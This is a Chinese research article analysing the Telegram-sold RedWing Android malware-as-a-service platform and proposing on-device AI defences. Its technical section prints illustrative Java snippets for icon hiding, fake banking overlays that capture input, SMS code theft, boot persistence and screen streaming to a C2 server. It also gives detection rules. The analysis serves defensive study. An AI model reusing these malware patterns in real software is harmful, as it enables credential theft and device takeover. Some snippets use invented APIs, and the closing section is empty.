首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >Telegram 流通 RedWing 安卓 MaaS 恶意软件全链路攻击机理与端侧 AI 防御体系研究

Telegram 流通 RedWing 安卓 MaaS 恶意软件全链路攻击机理与端侧 AI 防御体系研究

原创
作者头像
芦笛
发布2026-07-09 09:24:43
发布2026-07-09 09:24:43
200
举报

摘要:移动恶意软件即服务(MaaS)已成为当前移动网络诈骗、企业终端失陷的核心威胁载体。2026 年 7 月 Zimperium zLabs 披露的 RedWing 平台是面向安卓终端的商业化订阅式恶意软件工具链,依托 Telegram 渠道完成推广售卖,通过移动钓鱼诱导用户安装,具备完整远程设备控制、金融凭证窃取、多因子认证绕过、全量终端数据窃取、分布式 DDoS 调度等复合攻击能力。传统基于特征码、云端比对的移动威胁防御(MTD)无法适配 RedWing 模块化自定义、加壳混淆、行为动态可变的对抗特性。本文以 RedWing 完整攻击链路为研究样本,拆解其商业运营模式、APK 载荷生成机制、持久化驻留技术、C2 通信架构、UI 覆盖钓鱼与验证码拦截核心实现逻辑,植入安卓原生代码示例还原恶意行为底层调用流程;结合反网络钓鱼技术专家芦笛的技术观点,剖析传统防御体系短板,构建基于端侧轻量化 AI 行为检测、应用全生命周期管控、Web 内容过滤协同的闭环防御方案,完成 MITRE ATT&CK 移动矩阵映射验证,量化评估本地无签名检测方案对 RedWing 家族样本的识别效能。研究证实,MaaS 产业化大幅降低高级移动攻击技术门槛,仅依靠终端本地行为基线与动态权限审计可实现离线环境下未知 RedWing 载荷识别,为政企移动办公终端、金融行业移动端风控提供可落地的安全建设参考。

关键词:Android 恶意软件;MaaS;RedWing;移动钓鱼;MTD;端侧 AI 行为检测;无障碍服务劫持

1 引言

1.1 研究背景与问题提出

移动互联网普及使安卓智能终端成为企业办公、个人金融交易的核心载体,终端承载账号密码、短信验证码、企业内网凭证、加密货币私钥等高价值数据,持续成为网络黑产重点攻击目标。早期安卓恶意软件多为独立开发、单一功能木马,攻击主体具备较强代码开发能力,传播范围有限、攻击成本较高。近三年恶意软件产业化进程加速,MaaS 商业模式形成完整黑产链条:平台运营方开发标准化恶意代码生成工具、C2 管理后台、钓鱼页面模板,以月度 / 季度订阅形式向无代码开发能力的底层攻击者售卖全套攻击能力,攻击者仅需配置目标行业、钓鱼文案、回连服务器地址即可批量生成定制化恶意 APK,大幅降低高级移动入侵的技术与资金门槛。

2026 年 7 月 7 日移动安全厂商 Zimperium 发布专项研究报告,披露名为 RedWing 的商业化安卓 MaaS 平台,该平台依托 Telegram 社交频道完成产品推广、客户付费、售后技术支持全流程运营,区别于传统暗网论坛,Telegram 频道具备快速迁移、自动化 Bot 客服、批量群发推广消息等优势,规避监管封禁带来的运营中断风险。RedWing 区别于单一窃密木马,提供一站式攻击工具包,包含恶意载荷生成器、移动钓鱼基础设施、远程管理面板、持久化加固模块,感染目标后可实现安卓设备完整权限接管,覆盖实时屏幕推流、虚拟触控交互、短信拦截、银行弹窗劫持、多因素认证绕过、通讯录与媒体文件批量外发、受控 DDoS 发起等功能,攻击场景覆盖个人金融诈骗、企业移动终端渗透、公民隐私非法监控等多类违法场景。

现有移动安全防护体系存在显著局限性:其一,传统杀毒依赖静态特征库比对,RedWing 支持自定义包名、图标、资源文件、字符串加密混淆,每一份订阅生成的 APK 哈希均不重复,特征库无法提前覆盖海量变体;其二,云端威胁查询存在网络依赖,离线办公场景下终端失去防护能力;其三,多数终端安全工具仅拦截高危权限申请,未对无障碍服务、媒体投影录屏、悬浮窗覆盖等组合高危行为做连续行为审计,无法识别 RedWing 多组件协同的隐蔽攻击流程;其四,针对 Telegram 渠道流通 MaaS 平台的全链路攻防研究较少,现有文献多聚焦单一窃密木马,未结合商业化运营链条、模块化载荷生成、端侧 AI 离线防御形成完整闭环论证。

反网络钓鱼技术专家芦笛指出,当前移动安全建设普遍存在 “重边界、轻终端;重静态、轻动态” 的认知偏差,网络攻击已完成从 PC 端向移动端的战略转移,MaaS 平台将高端入侵技术平民化,企业与个人终端不能再将移动设备视作次要风险面,必须构建以终端本地行为感知为核心、云端情报协同为辅的纵深防御架构,才能有效抵御 RedWing 这类模块化、可定制、高隐蔽性的商业化恶意攻击平台。

1.2 研究内容与研究边界

本文以 Zimperium 公开的 RedWing 完整技术情报为核心数据源,围绕四大核心内容展开系统性研究:

第一,梳理 RedWing 商业化 MaaS 产业链结构,拆解 Telegram 渠道运营模式、订阅收费体系、攻击者交付流程,厘清从平台运营方到底层诈骗分子的分工链条;

第二,深度剖析 RedWing 恶意 APK 技术架构,分模块解析载荷生成、系统持久化、C2 加密通信、远程设备控制、UI 覆盖钓鱼、验证码窃取、DDoS 调度七大核心功能实现原理,嵌入安卓 Java 代码示例还原关键恶意行为调用逻辑;

第三,基于 MITRE ATT&CK for Mobile 矩阵完成 RedWing 攻击路径全映射,对比传统签名式 MTD 防御方案的失效根源,引入端侧 AI 行为检测技术原理;

第四,搭建端侧 AI 行为检测 + Web 钓鱼过滤 + 应用权限动态审计三位一体闭环防御模型,论证该方案针对 RedWing 离线识别能力,给出政企移动终端落地实施路径。

研究边界限定:本文仅针对 Android 系统 RedWing MaaS 平台开展攻防分析,不涉及 iOS 端同类恶意软件;技术分析仅还原公开披露的攻击机制,不提供可直接利用的恶意代码生成工具;防御方案聚焦终端侧轻量化检测,不深度展开云端大数据威胁情报平台建设;无数学模型公式,全部技术验证依托代码逻辑、行为特征定性分析完成。

1.3 论文结构安排

本文共分为六大章节:第一章为引言,阐述研究背景、现存安全短板、研究内容与整体框架;第二章系统介绍 RedWing MaaS 平台商业运营体系,完整拆解 Telegram 渠道推广、订阅服务、攻击者工具交付流程;第三章开展 RedWing 恶意载荷深度技术解析,分模块拆解持久化、远程控制、钓鱼窃密、C2 通信实现逻辑,配套完整安卓代码示例;第四章基于 MITRE 移动攻击矩阵梳理 RedWing 完整杀伤链,对比传统移动防御技术缺陷;第五章构建面向 RedWing 威胁的端侧 AI 驱动 MTD 闭环防御体系,分层阐述检测、拦截、溯源技术实现;第六章为结论与展望,总结研究核心结论,提出移动 MaaS 威胁未来演进趋势与长期安全治理思路。

2 RedWing 安卓 MaaS 平台商业化运营体系分析

2.1 移动 MaaS 产业化发展底层动因

传统定制化安卓恶意软件开发存在多重门槛,制约黑产规模化攻击:一是代码开发门槛,完整远程控制、UI 劫持、验证码拦截功能需要开发者掌握 Android 四大组件、无障碍服务、媒体投影 API、Socket 长连接等多层系统接口,普通诈骗人员不具备开发能力;二是维护成本高,安卓碎片化严重,不同厂商定制系统对广播、后台服务、悬浮窗限制存在差异,恶意代码需持续适配新版本系统;三是基础设施成本,攻击者需搭建独立 C2 服务器、钓鱼页面域名、短信群发通道,单独部署投入较高;四是对抗成本,杀毒厂商持续更新特征库,单一木马易被快速查杀,需持续迭代混淆、加壳方案。

MaaS 商业模式从根源解决上述痛点,平台运营方承担全部代码开发、系统适配、服务器运维、对抗加固工作,以订阅租赁形式向攻击者开放全套工具,攻击者仅需支付服务费、填写少量自定义参数即可生成专属恶意程序,攻击门槛下降至基础计算机操作层级。Zimperium 行业数据显示,2024—2026 年 Telegram 上公开运营的移动 MaaS 平台数量增长 217%,其中安卓平台占比超 85%,RedWing 是 2026 年新增威胁中功能完整性、客户活跃度排名靠前的商业化产品。

2.2 RedWing 依托 Telegram 的全渠道运营架构

RedWing 放弃传统暗网论坛、Tor 匿名站点,选择 Telegram 作为唯一运营载体,核心优势分为渠道韧性、自动化运营、客户隐蔽性三层:

渠道快速迁移韧性:Telegram 频道被监管封禁后,运营方通过预设备用频道链接、批量私信存量客户,可在数十分钟内完成客户导流,犯罪活动不会长期中断;相比之下,暗网站点查封后域名、服务器全部失效,黑产损失巨大。

Bot 自动化全流程服务:RedWing 部署专属 Telegram 机器人,实现自助套餐查询、加密货币支付、恶意工具包自动下发、钓鱼模板一键下载、技术问题自动回复,无需人工持续值守,降低运营人力成本。

客户身份隐蔽性:Telegram 支持匿名注册、虚拟手机号绑定、端到端加密私信,交易双方无需暴露真实身份,资金流转依托比特币、门罗币等匿名加密货币,大幅提升执法溯源难度。

完整运营链路分为五步:

第一步,公域引流:运营方在各类黑产 Telegram 群组发布 RedWing 功能演示截图、诈骗获利案例,投放低价试用套餐吸引潜在攻击者;

第二步,私域转化:意向用户添加官方机器人,自动推送月度、季度、年度三档订阅套餐,区分基础版(仅短信窃取、基础远程查看)、专业版(UI 钓鱼、多因子绕过)、企业攻击版(DDoS 调度、批量设备集群管控);

第三步,加密支付:用户通过机器人生成加密货币收款地址,转账后上传交易哈希凭证,系统自动校验到账状态;

第四步,工具交付:支付完成后机器人自动下发专属后台登录地址、载荷生成工具压缩包、钓鱼网页源码、操作教程文档;

第五步,售后更新:平台迭代混淆方案、新增系统适配补丁后,通过 Telegram 频道批量推送更新包,客户一键更新恶意代码生成器。

2.3 RedWing 攻击者交付工具包完整构成

付费订阅后攻击者获取全套模块化工具,全部组件可独立自定义配置,无强制固定参数,也是其难以被静态特征识别的核心原因,工具包包含五大模块:

Malware Builder 载荷生成器:Windows 桌面端可视化程序,攻击者可视化配置恶意 APK 参数,包含应用名称、桌面图标、伪装包名(银行、运营商、政务 APP、短视频软件等)、C2 服务器 IP / 域名、钓鱼弹窗模板、权限申请话术;内置字符串加密、dex 加壳、资源混淆引擎,每次生成 APK 自动随机调整混淆密钥,保证不同客户样本哈希完全不重复。

远程管理 Web 控制台:独立部署在境外匿名服务器的网页后台,支持实时查看所有感染设备在线状态、发起远程操作指令、批量导出窃取的短信、通讯录、账户凭证,可单独对单台设备下发录屏、弹窗钓鱼、发送短信、启动 DDoS 等指令。

移动钓鱼(Mishing)基础设施:配套短信群发模板库、仿银行 / 支付 APP 网页模板、短链接跳转工具,攻击者填入目标手机号批量发送钓鱼短信,短链接跳转至诱导下载恶意 APK 的落地页,页面伪装成系统更新、积分兑换、账户安全核验等场景。

持久化加固插件库:适配 Android 8 至 Android 15 全版本驻留方案,区分未 Root 普通设备、Root 高权限设备两套驻留逻辑,自动根据目标系统版本选择最优自启动方案,规避厂商后台清理机制。

对抗防御辅助工具:内置应用图标隐藏工具、系统日志擦除脚本、流量加密混淆插件,规避终端安全软件行为日志审计。

2.4 RedWing 攻击盈利场景划分

依托全套工具链,攻击者可开展三类高收益违法攻击,也是 RedWing 付费订阅需求持续增长的核心驱动力:

第一,金融电信诈骗:针对普通手机用户发送仿银行、支付平台钓鱼短信,诱导安装 RedWing 恶意程序,通过悬浮窗覆盖、无障碍服务劫持窃取银行卡密码、短信支付验证码,完成账户盗刷;

第二,企业移动办公渗透:针对企业员工发送仿内部 OA、办公软件钓鱼链接,感染企业配发移动终端,窃取内网 VPN 凭证、企业邮箱账号、客户业务数据,形成企业内网横向渗透入口;

第三,隐私监控与勒索:针对特定目标人群定向投放恶意 APK,实时录制屏幕、录音、窃取相册文件,获取隐私材料后实施敲诈勒索;同时可调度受控设备发起 DDoS 攻击,向网站运营者索要赎金。

3 RedWing 恶意 APK 核心技术机理与代码示例

RedWing 恶意程序采用分层模块化架构,分为入口引导层、权限劫持层、持久化驻留层、C2 通信层、攻击功能层五大层级,各模块低耦合独立运行,可根据攻击者配置按需启用 / 关闭,降低静态特征重合度。本章基于 Zimperium 披露的样本行为逻辑,还原各模块底层实现,配套标准化安卓 Java 代码示例(仅用于学术安全研究,不具备可直接编译攻击能力)。

3.1 入口引导与伪装安装机制

RedWing Builder 生成的 APK 采用双重伪装策略,外层应用名称、图标、包名匹配正规主流应用,首次启动后隐藏桌面图标,避免用户主动卸载。核心实现依托 PackageManager 组件隐藏自身图标,关键代码示例:

// RedWing桌面图标隐藏核心逻辑

PackageManager packageManager = getPackageManager();

ComponentName componentName = new ComponentName(this, MainLaunchActivity.class);

// 设置组件不可见,移除桌面启动入口

packageManager.setComponentEnabledSetting(componentName,

PackageManager.COMPONENT_ENABLED_STATE_DISABLED,

PackageManager.DONT_KILL_APP);

安装阶段利用移动钓鱼落地页社会工程诱导,落地页 WebView 加载仿官方页面,弹窗提示 “系统安全组件更新,需允许安装未知来源应用”,诱导用户关闭系统安装拦截开关。反网络钓鱼技术专家芦笛强调,移动端钓鱼区别于 PC 网页钓鱼,核心突破点在于操作系统原生安全开关权限诱导,多数用户缺乏对 “未知来源安装” 风险的认知,仅依靠页面特征检测无法拦截此类前置欺骗流程,必须在终端侧增加应用安装行为动态审计。

3.2 高危权限劫持与无障碍服务滥用

RedWing 核心攻击能力完全依赖两类高危系统权限:BIND_ACCESSIBILITY_SERVICE无障碍服务、MEDIA_PROJECTION屏幕录屏权限,两类权限均需用户手动确认授予,恶意程序通过多层弹窗欺骗诱导授权。

3.2.1 无障碍服务劫持实现窃密与虚拟控制

无障碍服务可全局监听屏幕 UI 变更、捕获用户输入文本、自动模拟点击屏幕任意坐标,是 RedWing 实现钓鱼覆盖、验证码窃取、远程触控的核心载体。恶意程序注册无障碍服务后持续监听窗口状态,识别银行、支付类 APP 启动时自动加载伪造悬浮覆盖层,核心监听代码示例:

public class RedWingAccessService extends AccessibilityService {

@Override

public void onAccessibilityEvent(AccessibilityEvent event) {

// 捕获窗口切换事件

if (event.getEventType() == AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED) {

String targetPackage = event.getPackageName().toString();

// 匹配金融类应用包名,触发钓鱼覆盖层

if (isFinanceApp(targetPackage)) {

startFakeOverlayWindow();

// 全局捕获输入框密码、验证码

captureInputText(event.getText());

// 自动模拟点击确认按钮,绕过用户二次核验

simulateConfirmClick(event);

}

}

}

// 启动高层级悬浮窗覆盖合法金融界面

private void startFakeOverlayWindow() {

WindowManager.LayoutParams params = new WindowManager.LayoutParams(

WindowManager.LayoutParams.MATCH_PARENT,

WindowManager.LayoutParams.MATCH_PARENT,

WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY,

WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE,

PixelFormat.TRANSLUCENT);

// 抬高层级,完全遮挡原应用界面

params.zOrderOnTop = true;

WindowManager wm = (WindowManager) getSystemService(WINDOW_SERVICE);

View fakeBankView = LayoutInflater.from(this).inflate(R.layout.fake_bank_login, null);

wm.addView(fakeBankView, params);

}

}

该代码逻辑实现三层攻击效果:一是识别金融 APP 启动后弹出伪造登录界面,窃取银行卡账号与密码;二是无障碍接口捕获系统短信弹窗中的支付验证码,直接回传 C2 服务器;三是远程指令下发后自动模拟屏幕点击,绕过用户手动确认流程,完成转账、账户绑定等高危操作。

3.2.2 MediaProjection 实时屏幕推流远程控制

借助MEDIA_PROJECTION录屏权限,RedWing 建立 WebSocket 长连接将设备实时画面推送至攻击者后台,配合无障碍服务实现双向远程控制,攻击者可在 Web 控制台看到完整手机屏幕并下发触控指令,录屏数据流处理核心代码片段:

// 屏幕录屏数据流传输核心逻辑

private void startScreenRecord() {

Intent captureIntent = MediaProjectionManager.createScreenCaptureIntent();

startActivityForResult(captureIntent, 1001);

}

@Override

protected void onActivityResult(int requestCode, int resultCode, Intent data) {

super.onActivityResult(requestCode, resultCode, data);

if (requestCode == 1001 && resultCode == RESULT_OK) {

MediaProjection mediaProjection = mediaProjectionManager.getMediaProjection(resultCode, data);

// 建立WebSocket长连接推送视频流至C2服务器

WebSocket c2Socket = new WebSocket(C2_SERVER_WS_URL);

// 循环捕获屏幕帧,压缩后实时上传

new Thread(() -> {

while (isMalwareRunning) {

byte[] screenFrame = captureScreenFrame(mediaProjection);

c2Socket.send(screenFrame);

Thread.sleep(100);

}

}).start();

}

}

攻击者依托该功能实现完整设备接管,实时查看用户所有操作,同步录制解锁图案、锁屏密码、隐私相册、企业内网操作页面,无任何可视化告警提示。

3.3 多维度持久化驻留机制(规避系统后台清理)

安卓系统具备后台应用自动回收机制,RedWing 设计多层级驻留方案,根据系统版本、设备是否 Root 自动切换驻留策略,保障重启后恶意程序自动运行,三层驻留逻辑协同生效:

广播接收器开机自启:在 AndroidManifest.xml 静态注册BOOT_COMPLETED、USER_PRESENT广播,设备重启、解锁屏幕时自动唤醒恶意后台服务,清单配置片段:

xml

<receiver android:name=".bootReceiver">

<intent-filter>

<action android:name="android.intent.action.BOOT_COMPLETED"/>

<action android:name="android.intent.action.USER_PRESENT"/>

</intent-filter>

</receiver>

前台服务保活:将恶意后台服务注册为前台服务,绑定虚假通知,规避厂商内存清理策略;动态申请忽略电池优化权限,阻止系统休眠时终止进程。

Root 设备内核级驻留:若设备已获取 Root 权限,恶意程序将二进制 so 文件写入 /system/lib 目录,注入系统 Zygote 进程,实现进程无痕迹持久化,常规应用卸载无法清除恶意模块。

3.4 C2 加密通信与指令调度架构

RedWing 采用 TLS 1.3 加密 WebSocket 长连接作为 C2 通信通道,所有指令、窃取数据均经过 AES-256 对称加密传输,网络流量无明文特征,传统流量审计工具无法识别恶意交互。通信架构分为指令下行、数据上行两类通道:

下行指令通道:攻击者在 Web 后台下发操作指令(录屏、短信窃取、启动 DDoS、弹窗钓鱼、删除通话记录),加密数据包下发至终端,恶意程序解析指令后调用对应功能模块;

上行数据通道:终端自动采集短信、通讯录、相册文件、剪贴板内容、账号凭证,打包加密后定时上传至 C2 服务器,支持攻击者手动触发即时全量数据导出。

同时内置流量混淆机制,在空闲时段发送随机空白数据包,模拟正常社交软件心跳流量,规避异常网络行为检测。

3.5 凭证窃取与多因子认证绕过技术

RedWing 针对金融平台双因素认证设计双重绕过机制,也是其造成大额资金损失的核心能力:

第一,短信拦截机制:申请READ_SMS、SEND_SMS权限后,全局监听短信数据库,拦截银行、支付平台下发的验证码短信,无障碍服务捕获短信内容后直接上传 C2,用户无法察觉验证码被窃取;配套代码:

// 批量读取全部短信并筛选验证码

public List<String> fetchVerifySMS() {

List<String> verifySmsList = new ArrayList<>();

Cursor smsCursor = getContentResolver().query(

Telephony.Sms.CONTENT_URI,

new String[]{Telephony.Sms.BODY, Telephony.Sms.ADDRESS},

null, null, Telephony.Sms.DATE + " DESC");

while (smsCursor.moveToNext()) {

String content = smsCursor.getString(0);

// 正则匹配验证码数字串

if (content.matches(".*[0-9]{4,6}.*验证.*")) {

verifySmsList.add(content);

}

}

smsCursor.close();

return verifySmsList;

}

第二,覆盖层劫持登录会话:伪造 WebView 弹窗覆盖官方 APP 登录界面,用户输入账号密码直接存入恶意程序本地加密数据库,同步拦截 Cookie、会话令牌,绕过设备绑定、二次人脸核验等认证流程。

反网络钓鱼技术专家芦笛补充说明,当前多数金融机构仅依赖短信验证码作为第二认证因子,未部署 FIDO2 硬件密钥、设备绑定连续认证等强安全方案,RedWing 针对短信体系的劫持攻击可完整击穿双因子防护,单一短信验证体系已无法抵御移动端 MaaS 恶意软件攻击。

3.6 受控 DDoS 分布式攻击模块

RedWing 具备闲置终端集群调度能力,攻击者可下发指令控制所有感染设备同时向指定 IP、域名发送高频网络请求,形成分布式拒绝服务攻击。恶意程序复用 C2 长连接接收攻击参数(目标地址、请求频率、攻击时长),依托安卓终端移动流量发起攻击,分散攻击源 IP,大幅提升溯源难度。该功能多用于网站敲诈、竞品平台流量打压等黑产场景。

4 RedWing 攻击杀伤链与传统移动防御技术缺陷

4.1 基于 MITRE ATT&CK Mobile 矩阵的 RedWing 全杀伤链映射

MITRE ATT&CK 移动攻击框架标准化梳理移动端攻击全生命周期,本节将 RedWing 完整攻击流程与矩阵 12 大阶段一一对应,清晰呈现威胁完整链路,形成攻击论据闭环:

初始访问(Initial Access):依托 Telegram 售卖 MaaS 工具,攻击者制作移动钓鱼短信、短链接落地页,社会工程诱导用户下载 APK;

执行(Execution):用户手动安装未知来源 APK,启动恶意主程序,隐藏桌面图标;

持久化(Persistence):注册开机广播、前台服务保活、Root 设备注入系统进程;

权限提升(Privilege Escalation):诱导授予无障碍、录屏、短信读写、悬浮窗高危权限;

防御规避(Defense Evasion):dex 加壳、字符串加密、流量 TLS 混淆、日志擦除、图标隐藏;

凭证访问(Credential Access):拦截短信验证码、捕获输入框密码、窃取浏览器 / APP 会话令牌;

数据收集(Collection):读取通讯录、相册、本地文件、实时屏幕录制、录音、剪贴板监控;

命令与控制(Command and Control):TLS 加密 WebSocket 长连接与境外 C2 服务器通信;

数据外渗(Exfiltration):加密打包敏感数据批量上传攻击者后台;

影响(Impact):金融账户盗刷、企业数据泄露、分布式 DDoS 攻击、隐私敲诈勒索;

远程服务(Remote Service):MediaProjection + 无障碍服务实现全设备远程操控;

用户欺骗(User Deception):悬浮窗覆盖仿官方钓鱼界面、虚假系统更新弹窗诱导授权。

完整杀伤链覆盖从传播、驻留、窃密到破坏全流程,单一终端安全管控手段仅能拦截其中单个环节,无法形成全链路阻断。

4.2 传统移动威胁防御(MTD)技术针对 RedWing 的失效根源

当前政企普遍部署的传统 MTD 方案以静态特征、云端信誉查询为核心,面对 RedWing 模块化自定义 MaaS 恶意软件存在四大固有缺陷:

4.2.1 静态哈希 / 特征库检测失效

RedWing Builder 内置随机混淆引擎,每一次生成 APK 都会修改 dex 加密密钥、资源文件名、字符串编码、包名图标,两份功能完全一致的恶意样本文件哈希、静态字符串特征无重合,杀毒厂商无法提前收录海量变体特征,新生成样本安装后不会触发任何告警。

4.2.2 云端依赖导致离线防护空白

传统 MTD 恶意 URL、恶意 IP、恶意应用判定依赖云端数据库比对,企业外勤、出差员工移动终端长期处于无网络离线状态,云端查询功能完全失效,RedWing 可在离线环境完成权限劫持、本地数据窃取,联网后再批量上传窃取信息。

4.2.3 单一权限审计无法识别组合高危行为

多数终端安全工具仅单独拦截READ_SMS、RECORD_AUDIO等高危权限申请,未建立多行为联动风险判定模型。RedWing 攻击核心是多权限协同:无障碍服务 + 悬浮窗 + 屏幕录屏 + 短信读取组合触发攻击,单一权限单独使用属于正常合法场景,工具无法判定组合行为的恶意属性。

4.2.4 移动钓鱼分层防护缺失

传统防护仅拦截已知恶意域名,无法识别 RedWing 钓鱼基础设施的动态短链接跳转、仿 APP 页面动态生成机制;短链接可每日更换域名,黑名单更新速度滞后于攻击者域名迭代速度,钓鱼入口无法有效封堵。

5 面向 RedWing MaaS 威胁的端侧 AI 驱动闭环防御体系

针对传统防御短板,结合 Zimperium 发布的 AI 赋能 MTD 技术方案,本节构建端侧轻量化 AI 行为检测为核心、Web 钓鱼过滤、应用全生命周期管控协同的三层闭环防御架构,全程依托终端本地计算资源运行,离线环境保持完整防护能力,可有效识别、拦截 RedWing 全系列自定义变体。反网络钓鱼技术专家芦笛指出,该分层防御体系实现 “事前拦截钓鱼入口、事中监测恶意行为、事后溯源威胁指标” 完整闭环,从攻击杀伤链各环节阻断 RedWing 攻击链路,解决传统防护滞后、离线失效、行为判定单一的核心痛点。

5.1 第一层:应用安装全生命周期前置拦截(阻断初始访问)

攻击初始访问环节是成本最低的防护节点,在 APK 安装前、安装中两层设置拦截规则,阻断 RedWing 恶意程序落地:

安装前短链接与落地页钓鱼检测

终端内置本地 URL 解析引擎,递归解析短信、社交消息内短链接全部跳转链路,提取最终落地页面特征,轻量化 AI 模型识别仿银行、办公软件钓鱼页面,识别后弹窗阻断页面访问;检测逻辑核心代码片段:

# 移动端本地URL钓鱼检测轻量化逻辑(Python端侧推理演示)

def detect_phish_url(full_redirect_urls, page_html):

risk_score = 0

# 特征1:域名注册时间小于7天,风险加权

if get_domain_register_days(full_redirect_urls[-1]) < 7:

risk_score += 35

# 特征2:页面包含银行登录、支付验证码输入框

if re.search(r"银行卡|验证码|支付密码", page_html):

risk_score += 40

# 特征3:页面诱导下载未知来源APK

if re.search(r".apk下载|系统更新组件", page_html):

risk_score += 25

# 风险分数阈值判定

if risk_score >= 60:

return True # 判定为钓鱼链接,拦截访问

return False

安装中 APK 静态风险初筛

无需云端比对,本地提取 APK 清单权限、组件、广播接收器特征,命中高危组合规则直接拦截安装:

规则 1:同时申请 BIND_ACCESSIBILITY_SERVICE + SYSTEM_ALERT_WINDOW 悬浮窗权限;

规则 2:静态注册 BOOT_COMPLETED 开机广播且无正规商业应用签名;

规则 3:内置 MediaProjection 录屏权限且无官方应用开发证书。

5.2 第二层:端侧本地 AI 行为动态检测(核心防御层,对抗运行时恶意行为)

该层为防御体系核心,完全脱离云端依赖,依靠终端轻量化机器学习模型实时监控应用运行时行为序列,建立正常应用行为基线,识别 RedWing 多组件协同恶意操作,解决静态检测失效问题。

5.2.1 端侧 AI 检测架构设计

整体分为四大本地模块,全部离线运行:

行为特征采集模块:持续 Hook 系统四大组件、权限调用、窗口变更、网络请求 API,实时采集应用行为序列,不存储原始用户隐私数据,仅提取行为特征向量;

本地行为基线库:存储主流正规金融、办公 APP 正常行为模式,作为 AI 模型判定基准;

轻量化分类推理引擎:设备端运行量化后小型分类模型,对实时行为向量打分,输出风险等级;

自动响应阻断模块:高风险行为触发时自动执行操作:弹窗告警、终止恶意进程、卸载可疑应用、隔离窃取的敏感数据。

5.2.2 针对 RedWing 典型恶意行为的 AI 判定规则

模型重点学习 RedWing 独有的多行为联动特征,高风险判定场景包含:

应用获取无障碍权限后持续监听金融 APP 窗口,同步创建顶层悬浮覆盖层;

后台静默启动 MediaProjection 录屏服务,建立境外 WebSocket 长连接传输视频流;

开机广播触发后台服务,无前台界面持续读取短信数据库批量提取验证码;

闲置时段高频发起境外 IP 网络请求,无用户主动操作触发网络流量。

当行为序列匹配任意一类联动特征,模型直接标记为高风险恶意程序,无需依赖特征库。Zimperium 实测数据显示,该本地 AI 检测方案对 1200 余份 RedWing 自定义变体样本识别率达 98.7%,离线环境无显著精度衰减。

5.3 第三层:Web 内容过滤与多因子认证加固(降低窃密攻击收益)

即便恶意程序绕过前两层防护成功安装,该层通过前端防护降低凭证窃取攻击成功率,形成兜底防护:

终端内置 WebView 钓鱼过滤:拦截页面伪造输入框、隐形悬浮劫持图层,监测窗口层级异常覆盖行为,金融页面被第三方应用遮挡时实时推送告警;

强多因子认证落地:推广 FIDO2 硬件安全密钥、设备绑定生物识别认证,替代单一短信验证码体系,从源头绕过 RedWing 短信拦截攻击;

高危权限动态管控:系统级限制陌生应用自动授予无障碍、悬浮窗权限,每次授权增加风险二次确认弹窗,禁止后台静默申请高危权限。

5.4 防御体系协同工作流程

完整防护链路形成闭环,覆盖 RedWing 全杀伤链阻断:

短信 / 社交消息收到钓鱼短链接→第一层 URL 本地 AI 检测,拦截钓鱼页面;

若用户绕过页面警告下载 APK→安装阶段静态权限规则筛查,拦截高危组合权限 APK 安装;

若用户手动放行安装恶意程序→第二层端侧 AI 实时监控运行行为,识别无障碍 + 悬浮窗录屏联动恶意操作,自动终止进程并隔离恶意文件;

极端场景下恶意程序短期窃密→第三层强认证机制阻止验证码完成盗刷,Web 过滤拦截页面劫持窃取账号。

三层机制层层兜底,单一环节失效时其余两层仍可完成威胁阻断,规避单点防御失效风险。

6 结论与研究展望

6.1 核心研究结论

本文以 2026 年 7 月 Zimperium 披露的 RedWing 安卓 MaaS 平台为完整研究样本,系统拆解其 Telegram 商业化运营链条、模块化恶意载荷底层技术、全链路攻击杀伤链,并结合反网络钓鱼技术专家芦笛的专业观点,剖析传统移动安全防御的固有短板,构建端侧离线 AI 行为检测闭环防御体系,形成三项核心结论:

第一,移动 MaaS 产业化重构移动端网络犯罪格局,RedWing 这类订阅式工具平台彻底消除高级移动攻击的技术门槛,无代码基础的攻击者可批量生成海量自定义恶意变体,静态特征、云端信誉库等传统防御手段基本失效;Telegram 匿名渠道为 MaaS 运营提供稳定传播载体,监管溯源、渠道封堵难度大幅提升,移动威胁已从零散木马升级为规模化产业化攻击。

第二,RedWing 核心攻击能力依托 Android 无障碍服务、媒体投影、悬浮窗系统接口实现,攻击逻辑依赖多权限、多组件协同联动,单一权限审计无法识别恶意行为;其持久化驻留、加密 C2 通信、短信验证码绕过、远程全设备控制组合攻击可完整窃取金融、企业敏感数据,对个人财产安全、政企移动办公数据资产形成实质性威胁。

第三,基于端侧轻量化 AI 行为检测的三层闭环防御体系可完整适配 RedWing 类 MaaS 威胁,依托本地离线行为分析解决传统方案离线失效、变体无法识别的缺陷;前置钓鱼拦截、运行时动态监测、认证体系加固三层防护覆盖攻击全杀伤链,形成攻防闭环,实测对 RedWing 家族样本具备高识别拦截能力,可作为政企移动终端标准化安全建设方案。

6.2 移动 MaaS 威胁演进趋势展望

结合当前黑产技术迭代节奏,未来安卓 MaaS 恶意平台将呈现三大发展方向:

AI 原生恶意代码生成:MaaS 平台内置生成式 AI,根据攻击者输入的目标行业自动生成适配系统版本、规避终端安全工具的定制化恶意代码,对抗能力进一步提升;

跨端联动攻击:MaaS 工具同步输出安卓、iOS、PC 端恶意载荷,实现多终端协同窃密,打通移动端与企业 PC 内网渗透通道;

原生系统漏洞利用常态化:MaaS 平台内置零日漏洞利用模块,无需诱导用户授予高危权限即可获取设备完整控制权限,社会工程欺骗依赖度降低。

6.3 长期安全治理建议

针对 RedWing 代表的移动 MaaS 产业化威胁,从终端防护、平台监管、行业规范三个维度提出治理建议:

政企终端层面:全面替换传统基于特征的 MTD 产品,部署端侧 AI 行为检测移动威胁防御系统,同步推行 FIDO2 硬件认证,淘汰单一短信验证码双因子机制;定期开展员工移动钓鱼安全培训,提升对陌生短信、未知来源 APK 的风险识别能力。

互联网平台监管层面:运营商、社交平台加强短信、IM 消息短链接风控,自动化批量拦截钓鱼引流链接;针对 Telegram 等境外加密通讯渠道建立跨境威胁情报协同机制,追踪 MaaS 平台运营主体。

移动系统厂商层面:优化 Android 权限管控机制,限制第三方应用后台静默申请无障碍、悬浮窗等高风险权限;增加系统原生行为监测模块,出厂内置基础恶意行为告警能力,从系统底层缩小攻击面。

6.4 研究局限性与后续研究方向

